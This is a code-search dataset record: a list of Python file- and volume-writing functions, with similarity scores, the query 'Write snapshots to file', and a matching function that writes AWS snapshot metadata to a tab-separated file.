data on the ephemeral volume.\n self.persistent_dir = self.ephemeral_dir", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write_to_outfile(involume, outvolume, data, outfiles_partition, outdir_path, O, file_manager, addition, tracker):\n lowcorner, upcorner = get_overlap_subarray(involume, outvolume) # find subarray crossing both files in the basis of the original image\n overlap_vol = get_overlap_volume(involume, outvolume)\n overlap_shape = overlap_vol.get_shape()\n if DONT_WRITE:\n tracker.add_volume(overlap_vol)\n\n nb_outfile_seeks_tmp = 0\n s = overlap_shape\n if s[2] != O[2]:\n nb_outfile_seeks_tmp += s[0]*s[1]\n elif s[1] != O[1]:\n nb_outfile_seeks_tmp += s[0]\n elif s[0] != O[0]:\n nb_outfile_seeks_tmp += 1\n else:\n pass\n\n if DONT_WRITE:\n print(f\"Overlap shape: {overlap_shape}\")\n print(f\"Outfile shape: {O}\")\n print(f\"Number seeks: {nb_outfile_seeks_tmp}\")\n return overlap_shape, 0, nb_outfile_seeks_tmp\n\n slices = [(lowcorner[0], upcorner[0]), (lowcorner[1], upcorner[1]), (lowcorner[2], upcorner[2])]\n offset_in = involume.get_corners()[0] # lower corner\n offset_out = outvolume.get_corners()[0]\n\n slices_in_infile = [ # convert corners in the basis of input file\n (lowcorner[0]-offset_in[0], upcorner[0]-offset_in[0]), \n (lowcorner[1]-offset_in[1], upcorner[1]-offset_in[1]), \n (lowcorner[2]-offset_in[2], upcorner[2]-offset_in[2])]\n \n slices_in_outfile = [ # convert corners in the basis of output file\n (lowcorner[0]-offset_out[0], upcorner[0]-offset_out[0]), \n (lowcorner[1]-offset_out[1], upcorner[1]-offset_out[1]), \n (lowcorner[2]-offset_out[2], upcorner[2]-offset_out[2])]\n\n if DEBUG_LOCAL:\n logger.debug(f\"[debug] extracting {s[0][0]}:{s[0][1]}, {s[1][0]}:{s[1][1]}, {s[2][0]}:{s[2][1]} from input file\")\n logger.debug(f\"[debug] inserting {s2[0][0]}:{s2[0][1]}, {s2[1][0]}:{s2[1][1]}, {s2[2][0]}:{s2[2][1]} into output file {out_filename}\")\n\n s = slices_in_infile\n subarr_data = data[s[0][0]:s[0][1],s[1][0]:s[1][1],s[2][0]:s[2][1]] # extract subarr from input file's data \n\n _3d_pos = numeric_to_3d_pos(outvolume.index, outfiles_partition, order='C')\n i, j, k = _3d_pos\n\n if addition:\n subarr_data = subarr_data + 1\n\n global 
outdirs_dict, outdir_index\n\n if (i, j, k) in outdirs_dict.keys():\n outdir_path = outdirs_dict[(i, j, k)]\n print(f\"Writing at: {outdir_path}\")\n else:\n outdir_path = '/disk' + str(outdir_index) + '/gtimothee/output'\n outdirs_dict[(i, j, k)] = outdir_path\n outdir_index += 1\n if outdir_index == 6:\n outdir_index = 0\n\n print(f\"Writing at: {outdir_path}\")\n print(f\"Increasing writing index: {outdir_index}\")\n\n t2 = time.time()\n if not DONT_WRITE:\n file_manager.write_data(i, j, k, outdir_path, subarr_data, slices_in_outfile, O)\n t2 = time.time() - t2\n \n if DEBUG_LOCAL: \n file_manager.test_write(outfile_path, slices_in_outfile, subarr_data)\n\n return overlap_shape, t2, nb_outfile_seeks_tmp", "def write(self, filename, data):\n\t\t# create the path if it doesn't exists\n\t\tdir = os.path.dirname(filename)\n\t\tif not os.path.isdir(dir):\n\t\t\tos.mkdir(dir)\n\t\t\n\t\t# write data\n\t\tfile = codecs.open(filename, 'w', 'utf8')\n\t\tfile.write(data)\n\t\tfile.close()", "async def write_file(self, directory: str, name: str, file: bytes):\n pass", "def write_data():", "def save_inventory(file_name, table):\r\n with open(file_name, 'w') as objFile:\r\n for cd in table:\r\n objFile.write(cd.saveFormat())\r\n return table", "def write(self, out):", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def flow_write(filename,uv,v=None):\n TAG_CHAR = 'PIEH'\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def test_volumes_simple_volume(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /cpath: /hpath\n \"\"\"\n )\n\n config = scuba.config.load_config(\".scuba.yml\")\n assert len(config.volumes) == 1\n\n v = config.volumes[\"/cpath\"]\n assert v.container_path == \"/cpath\"\n assert v.host_path == \"/hpath\"", "def createLogicalVolume(self, vg, filesystem, name, mountpoint, size):\n lv = {}\n lv['command'] = 'create:logvol'\n lv['vg'] = vg\n lv['fs'] = filesystem\n lv['size'] = size - EXTENT_SIZE + 1\n lv['name'] = name\n lv['mountPoint'] = mountpoint\n lv['format'] = 'yes'\n\n return lv", "def save_to_file(content, song_name):\n file = open(\"./assets/homemade_partitions.txt\", \"a+\")\n # Move to the start of the file\n file.seek(0)\n # Read the total lines\n total_lines = len(file.readlines())\n # Move to the end of the file\n file.seek(0, 2)\n # Write the song's name\n file.write(f\"#{int(total_lines / 2 + 1)} {song_name}\\n\")\n # Write the song's partition\n file.write(content + \"\\n\")\n file.close()", "def write(self, file):\n #write header\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def write_file(self, filename):\n with open(filename, \"w\") as fo:\n # vertices\n\n for x, y, z in self.vertices:\n fo.write(\"v {} {} {}\\n\".format(x, y, z))\n logging.info(\"Wrote {} vertices\".format(len(self.vertices)))\n\n # faces\n faces = 0\n width, height = self.size\n for y in range(0, height-1):\n for x in range(0, width-1):\n tl = self.vertex_num(x,y)\n 
tr = tl + 1\n bl = tl + width\n br = bl + 1\n fo.write(\"f {} {} {}\\n\".format(tl, tr, bl))\n fo.write(\"f {} {} {}\\n\".format(tr, br, bl))\n faces += 2\n logging.info(\"Wrote {} tris\".format(faces))", "def write_aspera_secrets_to_disk():\n aspera_key_secret = get_secret_from_secrets_manager('ups-prod-aspera-key')\n aspera_file = open(\"/aspera/aspera.pk\", \"wb\")\n aspera_file.write(aspera_key_secret)\n aspera_file.flush()\n aspera_file.close()\n\n aspera_vcf_key_secret = get_secret_from_secrets_manager('ups-prod-aspera-vcf-key')\n aspera_vcf_file = open(\"/aspera/aspera_vcf.pk\", \"wb\")\n aspera_vcf_file.write(aspera_vcf_key_secret)\n aspera_vcf_file.flush()\n aspera_vcf_file.close()", "def write(self, path, **kwargs):\n client = self.connect(VAULT_TOKEN)\n client.write(path, **kwargs)", "def write(self, path, overwrite=False):\r\n\r\n self.data.write(path, format='ascii.fixed_width', delimiter='|', overwrite=overwrite)", "def write_content_to_file(\n vm_name, file_name, content=config.TEXT_CONTENT,\n vm_executor=None\n):\n command = ECHO_CMD % (content, file_name)\n return _run_cmd_on_remote_machine(vm_name, command, vm_executor)", "def create_volume(self, instance_id):\n user, instance = _get_user_and_instance(self.girder_client, instance_id)\n tale = self.girder_client.get('/tale/{taleId}'.format(**instance))\n\n self.job_manager.updateProgress(\n message='Creating volume', total=CREATE_VOLUME_STEP_TOTAL,\n current=1, forceFlush=True)\n\n vol_name = \"%s_%s_%s\" % (tale['_id'], user['login'], new_user(6))\n fs_sidecar = FSContainer.start_container(vol_name)\n payload = {\n \"mounts\": [\n {\n \"type\": \"data\",\n \"protocol\": \"girderfs\",\n \"location\": \"data\",\n },\n {\n \"type\": \"home\",\n \"protocol\": \"bind\",\n \"location\": \"home\",\n },\n {\n \"type\": \"workspace\",\n \"protocol\": \"bind\",\n \"location\": \"workspace\",\n },\n {\n \"type\": \"versions\",\n \"protocol\": \"girderfs\",\n \"location\": \"versions\",\n },\n {\n \"type\": \"runs\",\n \"protocol\": \"girderfs\",\n \"location\": \"runs\",\n },\n ],\n \"taleId\": tale[\"_id\"],\n \"userId\": user[\"_id\"],\n \"girderApiUrl\": GIRDER_API_URL,\n \"girderApiKey\": _get_api_key(self.girder_client),\n \"root\": vol_name,\n }\n FSContainer.mount(fs_sidecar, payload)\n self.job_manager.updateProgress(\n message='Volume created', total=CREATE_VOLUME_STEP_TOTAL,\n current=CREATE_VOLUME_STEP_TOTAL, forceFlush=True)\n print(\"WT Filesystem created successfully.\")\n\n cli = docker.from_env()\n return dict(\n nodeId=cli.info()['Swarm']['NodeID'],\n fscontainerId=fs_sidecar.id,\n volumeName=vol_name,\n instanceId=instance_id,\n taleId=tale[\"_id\"],\n )", "def write_to_binary_file(self, filename):\n\n self.octree.writeBinary(str.encode(filename))", "def write_block(self, index, block):\n writer = self.numbers_to_file(\n join(self.tempdir.name, BLOCK_FILE_NAME.format(index)))\n next(writer)\n for number in block:\n writer.send(number)\n writer.close()", "def write(file=None, dir=None, force=False):\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # Open the file for writing.\n file = open_write_file(file, dir, force)\n\n # Loop over the interatomic data containers and collect the data.\n data = []\n for interatom in interatomic_loop():\n # Skip deselected containers.\n if not interatom.select:\n continue\n\n # Skip containers with no J coupling.\n if not hasattr(interatom, 'j_coupling'):\n continue\n\n # Append the spin data.\n data.append([])\n data[-1].append(interatom.spin_id1)\n 
data[-1].append(interatom.spin_id2)\n\n # The value.\n data[-1].append(repr(interatom.j_coupling))\n\n # The error.\n if hasattr(interatom, 'j_coupling_err'):\n data[-1].append(repr(interatom.j_coupling_err))\n else:\n data[-1].append(repr(None))\n\n # Write out.\n write_data(out=file, headings=[\"Spin_ID1\", \"Spin_ID2\", \"J coupling\", \"J coupling\"], data=data)", "def writeBlade(self):\n\n ofname = self.blade1_file ### note, assuming they're all the same\n ofh = open(ofname,'w')\n\n for line in self.lines_blade:\n ofh.write(line)\n ofh.close()", "def write_files(self, basedir):\n outdir = basedir / self.type\n outdir.mkdir(parents=True, exist_ok=True)\n\n for point, row in zip(self.points, self.array):\n filepath = outdir / point\n with filepath.open('w') as f:\n idx = 0\n for ikey in self.pardict.keys():\n f.write(\"{} {}\\n\".format(ikey, row[idx]))\n idx += 1\n logging.debug('wrote %s', filepath)", "def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())", "def writeToFile(self):\n self.dto.writeToCsv()\n print(\"File written.\")", "def write_file(self, parser):\n # put an infinite loop at the end of the program\n if self.directory:\n # this means a path to a file was passed in\n if self.filename.endswith('.vm'):\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.directory,\n filename=self.basename,\n suffix=self.suffix\n )\n else:\n # this means a directory was passed in rather than a file\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.directory,\n filename=os.path.abspath(self.directory).split('/')[-1],\n suffix=self.suffix\n )\n\n else:\n # handle case of if . or .. is passed\n if not self.filename.endswith('.vm'):\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.filename,\n filename=os.path.abspath(self.abspath).split('/')[-1],\n suffix=self.suffix\n )\n else:\n # this means we are already in the directory of the file\n output_filename = '{filename}{suffix}'.format(\n filename=self.basename,\n suffix=self.suffix\n )\n with open('%s' % output_filename, 'w') as output_file:\n print('writing to {}'.format(output_filename))\n output_file.write('\\n'.join(parser.asm_commands_list))", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def write(data):", "def write(self):\n if self.skip_bootloader: # pylint: disable=no-member\n return\n\n if self.update_only: # pylint: disable=no-member\n self.update()\n return\n\n try:\n os.sync()\n self.stage2_device.format.sync(root=util.getTargetPhysicalRoot()) # pylint: disable=no-member\n self.install()\n finally:\n self.write_config() # pylint: disable=no-member", "def crear_fs(raiz, nvol):\n if nvol == None:\n nvol = \"NUEVO_VOL\"\n size_nvol = len(nvol)\n if size_nvol < 15:\n sobrante_nvol = 15 - size_nvol\n with open(raiz,\"w+\") as f:\n f.write((\"\\x00\"*(512*1440)))\n filesys = mmap.mmap(f.fileno(),0)\n filesys[0:8] = \"FiUnamFS\".encode('ascii')\n filesys[10:13] = \"0.7\".encode('ascii')\n filesys[20:35] = str((\"0\"*sobrante_nvol)+nvol).encode('ascii')\n filesys[40:45] = \"00512\".encode('ascii')\n filesys[47:49] = \"04\".encode('ascii')\n filesys[52:60] = \"00001440\".encode('ascii')\n for i in range(64):\n self.escribir_indir(filesys,i)\n filesys[512*5:] = str(\"\\x00\"*(512*1435)).encode('ascii')\n f.close()", "def writeFlow(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] 
== 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def writefile(name, instream, start=None, end=None, append=False):", "def _write(self, what):\n\n for i in xrange(5):\n if self.use_disk:\n # Write what to disk\n self.outfile.write(what)\n else:\n # Write what to RAM\n a = what[:]\n if self.use_disk:\n self._sync()", "def write_file(self, directory, name, content):\n\n try:\n f = open(os.path.join(directory, name), 'w')\n f.write(content)\n f.close()\n except:\n print \"Content not written to file: %s\" % name", "def writeDataToFile(self):\n if self.data is not None:\n self.notify.debug('Data is now synced with disk at %s' % \\\n self.filepath)\n if self.wantAnyDbm:\n self.data.sync()\n else:\n try:\n backuppath = self.filepath+ '.bu'\n if os.path.exists(self.filepath):\n os.rename(self.filepath,backuppath)\n \n outfile = open(self.filepath, 'w')\n cPickle.dump(self.data,outfile)\n outfile.close()\n \n if os.path.exists(backuppath):\n os.remove(backuppath)\n except EnvironmentError:\n self.notify.warning(str(sys.exc_info()[1]))\n else:\n self.notify.warning('No data to write. Aborting sync.')", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def fwrite(filename, text):\n basedir = os.path.dirname(filename)\n if not os.path.isdir(basedir):\n os.makedirs(basedir)\n\n with open(filename, 'w') as f:\n f.write(text)", "def create_volume_string(host_dir, container_dir, read_only = True):\n access = \"ro\" if read_only else \"rw\"\n return \":\".join([os.path.abspath(host_dir), container_dir, access])", "def __writeToFile(self, filePath, lst): \n \n if not self.outDir is None: \n filePath = os.path.join(self.outDir, filePath) \n \n open(filePath,'a').writelines(lst)", "def file_write(sp_length, sp_period, header, file_name):\n \n #specify filename and inform write\n out_file = open(file_name, \"w\")\n \n #add headers to file from list\n print(\"{0:>15}\".format(header[0]) ,\\\n \"{0:>15}\".format(header[1]) ,\\\n \"{0:>15}\".format(header[2]), file = out_file)\n \n #add data to file form lists \n for i in range(len(sp_length)):\n print(\"{0:>15}\".format(i) ,\\\n \"{0:>15.3f}\".format(sp_length[i]) ,\\\n \"{0:>15.3f}\".format(sp_period[i]), file = out_file)\n \n #close the file\n out_file.close()", "def test_volumes_null_volume_type(self):\n # NOTE: In the future, we might want to support this as a volume\n # (non-bindmount, e.g. 
'-v /somedata'), or as tmpfs\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /bar:\n \"\"\"\n )\n\n self._invalid_config(\"hostpath\")", "def save(items, name, file):\n dirname = os.path.dirname(file)\n if not os.path.isdir(dirname):\n logging.debug(\"creating directory %s\", dirname)\n os.makedirs(dirname)\n f = r.TFile(file, \"RECREATE\")\n f.WriteObject(vectorize(items, \"roast::Process*\"), name)\n f.Close()", "def save_data_to_file(file_name, list_of_product_objects):\r\n try:\r\n objF = open(file_name, \"w\")\r\n for row in list_of_product_objects:\r\n objF.write(str(row[0]) + \",\" + str(row[1]) + \"\\n\")\r\n objF.close()\r\n except IOError:\r\n print(\"Unable to locate file\")", "def test_aws_service_api_volumes_post(self):\n pass", "def write_contents(self):\n dfile = open(os.path.join(self.directory, self.file_name), 'w')\n dfile.write(self.contents.strip())", "def write_file(file_name, table):\r\n \r\n savectr=len(table)\r\n try:\r\n with open (file_name, 'wb') as objFile:\r\n pickle.dump(table,objFile) #pickle my 2D list\r\n print ('{} CD(s) saved into {}.\\n'.format(savectr,file_name))\r\n except PermissionError as e:\r\n print('Not enough rights to create/modify ' + file_name + '.') #if unable pickle data due to permission issues\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()\r\n except IOError as e:\r\n print ('I/O error({0}): {1}'.format(e.errno,e.strerror))#if unable to pickle data due to IO errors such as disk space issues\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()\r\n except pickle.PickleError as e:\r\n print ('Unable to write data into ' + file_name + '.') #if unable to pickle 2D list, exception handling for pickling errors\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()", "def write_binary(self, path):\n return", "def write( data ):", "def dump_blob(self, blob):\n path = os.path.join(self.rootpath, self.OBJECTPATH, blob.uuid[:2], blob.uuid[-2:]) + os.sep\n logging.debug(\"dump blob {}\".format(path))\n try:\n if not os.path.exists(path):\n os.makedirs(os.path.dirname(path), exist_ok=True)\n except OSError as exp:\n logging.error(\"Vault Error: {}\".format(exp))\n raise exp\n filepath = os.path.join(path, blob.uuid)\n blob.to_hdf5(filepath)\n # self.index.update_from_sdft(blob.metadata.sdft)\n self.index.update_from_metadata(blob.metadata)", "def create_block_file(blockTxns):\n textfile = open(\"/content/block.txt\", \"w\")\n for element in blockTxns:\n textfile.write(element + \"\\n\")\n textfile. 
close()", "def write_directories_to_file(output_file, directories):\n # print len(directories)\n file = open(output_file, 'w')\n print ('open file correctly' )\n for directory in directories:\n file.write(directory + '\\n')\n print ('No of lines has been written')\n print (len(directories) )\n file.close()", "def write_upload_files(self, appstruct):\n \n # Create the directory if it does not exist\n final_dir = \"thumbnails/%s\" % slugify(appstruct[\"serial\"])\n if not os.path.exists(final_dir):\n log.info(\"Make directory: %s\", final_dir)\n os.makedirs(final_dir)\n\n final_file = \"%s/uploaded.pdf\" % final_dir\n file_pointer = appstruct[\"pdf_upload\"][\"fp\"]\n self.single_file_write(file_pointer, final_file)", "def add_writable_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if volume.resolved.startswith(\"_:\"):\n # Synthetic directory that needs creating first\n if not host_outdir_tgt:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n new_dir = os.path.join(\n tempfile.mkdtemp(dir=self.tmpdir),\n os.path.basename(volume.target))\n self._add_volume_binding(new_dir, volume.target, writable=True)\n elif not os.path.exists(host_outdir_tgt):\n log.debug('os.makedirs({}, 0o0755)'.format(host_outdir_tgt))\n os.makedirs(host_outdir_tgt, 0o0755)\n else:\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if not host_outdir_tgt:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n new_dir = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copytree({}, {})'.format(volume.resolved, new_dir))\n shutil.copytree(volume.resolved, new_dir)\n self._add_volume_binding(new_dir, volume.target, writable=True)\n else:\n log.debug('shutil.copytree({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copytree(volume.resolved, host_outdir_tgt)\n ensure_writable(host_outdir_tgt or new_dir)", "def write_to_file(file, name):\n with open(file, \"a\") as player_list:\n player_list.writelines(name)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def save_inventory(file_name, lst_Inventory):\r\n \r\n objFile = open(file_name, 'w')\r\n for row in lst_Inventory:\r\n lstValues = [cd_instance.cd_id, cd_instance.cd_title, cd_instance.cd_artist]\r\n lstValues[0] = str(lstValues[0])\r\n objFile.write(','.join(lstValues) + '\\n')\r\n objFile.close()" ]
[ "0.62202305", "0.59282184", "0.59282184", "0.5797909", "0.57411486", "0.570655", "0.5696261", "0.5676645", "0.5656309", "0.56229556", "0.5577266", "0.5544393", "0.55409503", "0.5499961", "0.5476858", "0.5472212", "0.54446274", "0.5439978", "0.54305", "0.54144007", "0.53972524", "0.53766423", "0.53749436", "0.536948", "0.53655744", "0.53638554", "0.53552955", "0.5350401", "0.5343024", "0.5334971", "0.5328791", "0.5327325", "0.53257334", "0.53246444", "0.5323475", "0.53233963", "0.5315777", "0.53144735", "0.531244", "0.5301461", "0.5298637", "0.5297545", "0.52948457", "0.52935994", "0.5286618", "0.5284697", "0.5283734", "0.52759576", "0.52641344", "0.52607715", "0.5257288", "0.52495974", "0.52427685", "0.5239556", "0.5224378", "0.5222467", "0.5214352", "0.52115524", "0.5210862", "0.52093524", "0.51981527", "0.51960486", "0.5176407", "0.51758045", "0.5168027", "0.5162726", "0.51552", "0.51490945", "0.51448107", "0.51419854", "0.51399165", "0.513878", "0.512988", "0.511849", "0.5113398", "0.5104581", "0.51026535", "0.51015246", "0.5101265", "0.50962776", "0.5095861", "0.5092839", "0.50917935", "0.5080719", "0.50722533", "0.50703216", "0.5064683", "0.50629425", "0.50603604", "0.5059736", "0.5058036", "0.505763", "0.504957", "0.50487757", "0.50465643", "0.5045428", "0.5044767", "0.5042788", "0.50402915", "0.5039725" ]
0.59575117
1
Write snapshots to file
def generateInfoSnapshots(regions): print "Writing snapshots info to output file %s" % snapshots_data_output_file snapshots = [] for r in regions: snapshots += getSnapshotsD(r) print "." # feedback for the user with open(snapshots_data_output_file, 'w') as f2: f2.write("SNAPSHOTS\n") f2.write( "Name\tsnapshot_id\tKEEP-tag_of_snapshot\tKEEP-tag_of_AMI\tproduction?\tassociated_AMI\tstart_time\tstatus" "\tregion\tprogress\tassociated_volume\tvolume_size\tdescription\n\n") for s in snapshots: f2.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'], s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_snapshot(self):\n json.dump(self.snapshot, open(paths.RESULTS_FILE, 'w'), indent=4, sort_keys=True)", "def saveSnapshot(self, filename): \n\t\tpass", "def write_to_file(self, filename: str) -> None:", "def save_snapshot(args):\n html_doc = document.Document(get_code(args.file))\n info = html_doc.save(args.message, date=args.edition, region=args.region)\n if info is None:\n print('Duplicate snapshot. No snapshot saved.')\n else:\n print('Snapshot saved for {:s} {:%B %d, %Y}. '.format(info[2].capitalize(), info[3]) +\n '{0!r:} - {1:%B} {1.day:2}, {1:%Y %l:%M:%S.%f %p}'.format(info[0], info[1]))", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write_snapshots_single_file(dynGraph: DynGraphSN, outputFile: str,both_directions=False):\n f = open(outputFile,\"w\")\n allGraphs = dynGraph.snapshots()\n for t,g in allGraphs.items():\n for e in g.edges():\n weights=\" \"+str(1)\n f.write(str(t)+\" \"+str(e[0])+\" \"+str(e[1])+weights+\"\\n\")\n if both_directions:\n f.write(str(t) + \" \" + str(e[1]) + \" \" + str(e[0]) + weights + \"\\n\")\n f.close()", "def _write(self, schema, writer, snapshots):\n encoder = self.serializer\n doc = {\n META_SCHEMA: [encoder.serialize_column(c) for c in schema],\n META_SNAPSHOTS: [encoder.serialize_snapshot(s) for s in snapshots],\n META_ROWCOUNT: writer.row_counter,\n META_PRIMARYKEY: self._primary_key\n }\n with open(self.tmpmetafile, 'w') as f:\n json.dump(doc, f, cls=self.encoder)\n # Close the archive writer.\n writer.close()\n # Replace existing files with temporary files for new archive version.\n # This is the point of no return.\n # TODO: Instead of moving files we could delete (or keep) previous\n # files as backup.\n shutil.move(src=self.tmpmetafile, dst=self.metafile)\n shutil.move(src=self.tmpdatafile, dst=self.datafile)", "def save_snapshot(snapshot_id):\n\n if comm is not None:\n comm.barrier() # if parallel, ensure that we are always in sync, so snapshots are always a consistent set\n\n if ns_args['snapshot_per_parallel_task']:\n rank_id = \"%d\" % rank\n else:\n rank_id = \"ALL\"\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n try:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%s.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n except:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%d.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n\n root_walkers_write_t0 = time.time()\n for at in walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"root walkers write time \", time.time() - root_walkers_write_t0\n\n if not ns_args['snapshot_per_parallel_task']:\n if comm is not None: # gather other walkers to do I/O on master task\n if rank == 0: # I/O on master task\n for r in range(1,size):\n remote_walkers_recv_t0 = time.time()\n remote_walkers = comm.recv(source=r, tag=2)\n print \"save_snapshot remote walkers recv time \", r, time.time() - remote_walkers_recv_t0\n remote_walkers_write_t0 = time.time()\n for at in remote_walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"save_snapshot remote walkers write time \", r, time.time() - remote_walkers_write_t0\n else: # not master task\n comm.send(walkers, dest=0, tag=2)\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n snapshot_io.close()", "def write(self, outfile, 
rebasings=None):\r\n raise NotImplementedError()", "async def snapshots(secspy, cameras):\n _LOGGER.info(\"SAVE SNAPSHOTS:\")\n\n for camera in cameras:\n filename = f\"snapshot_{camera}.jpg\"\n image = await secspy.get_snapshot_image(camera)\n with open(filename, \"wb\") as img_file:\n _LOGGER.info(f\"Writing snapshot {filename}\")\n img_file.write(image)\n time.sleep(1)", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def _write(self):\n\n output_path = os.path.join(config.S3_OUTPUT, config.DATAFRAME_ARTISTS)\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n\n print('Writing dataframe to {}'.format(output_path))\n\n dataframe.write.parquet(\n output_path,\n mode='overwrite'\n )", "def write_snapshots(dynGraph:DynGraphSN, outputDir:str, format:str=None):\n if format==None:\n format=\"edges\"\n allGraphs = dynGraph.snapshots()\n for g in allGraphs:\n _write_network_file(allGraphs[g],os.path.join(outputDir,str(g)),out_format=format)", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, fname):\n pass", "def writestat(self, snapshot, halos, statoutfile, hubble=None):\n s = snapshot\n mindarkmass = min(s.dark['mass'])\n\n if hubble is None:\n hubble = s.properties['h']\n\n outfile = statoutfile\n logger.info(\"Writing stat file to %s\" % statoutfile)\n fpout = open(outfile, \"w\")\n header = \"#Grp N_tot N_gas N_star N_dark Mvir(M_sol) Rvir(kpc) GasMass(M_sol) StarMass(M_sol) DarkMass(M_sol) V_max R@V_max VelDisp Xc Yc Zc VXc VYc VZc Contam Satellite? False? ID_A\"\n print >> fpout, header\n nhalos = halos._nhalos\n for ii in xrange(nhalos):\n h = halos[ii + 1].properties # halo index starts with 1 not 0\n # 'Contaminated'? means multiple dark matter particle masses in halo)\"\n icontam = np.where(halos[ii + 1].dark['mass'] > mindarkmass)\n if (len(icontam[0]) > 0):\n contam = \"contam\"\n else:\n contam = \"clean\"\n # may want to add implement satellite test and false central\n # breakup test.\n\n n_dark = h['npart'] - h['n_gas'] - h['n_star']\n M_dark = h['mass'] - h['M_gas'] - h['M_star']\n ss = \" \" # can adjust column spacing\n outstring = str(int(h['halo_id'])) + ss\n outstring += str(int(h['npart'])) + ss + str(int(h['n_gas'])) + ss\n outstring += str(int(h['n_star'])) + ss + str(int(n_dark)) + ss\n outstring += str(h['mass'] / hubble) + ss + \\\n str(h['Rvir'] / hubble) + ss\n outstring += str(h['M_gas'] / hubble) + ss + \\\n str(h['M_star'] / hubble) + ss\n outstring += str(M_dark / hubble) + ss\n outstring += str(h['Vmax']) + ss + str(h['Rmax'] / hubble) + ss\n outstring += str(h['sigV']) + ss\n # pos: convert kpc/h to mpc (no h).\n outstring += str(h['Xc'] / hubble / 1000.) + ss\n outstring += str(h['Yc'] / hubble / 1000.) + ss\n outstring += str(h['Zc'] / hubble / 1000.) + ss\n outstring += str(h['VXc']) + ss + \\\n str(h['VYc']) + ss + str(h['VZc']) + ss\n outstring += contam + ss\n outstring += \"unknown\" + \\\n ss # unknown means sat. 
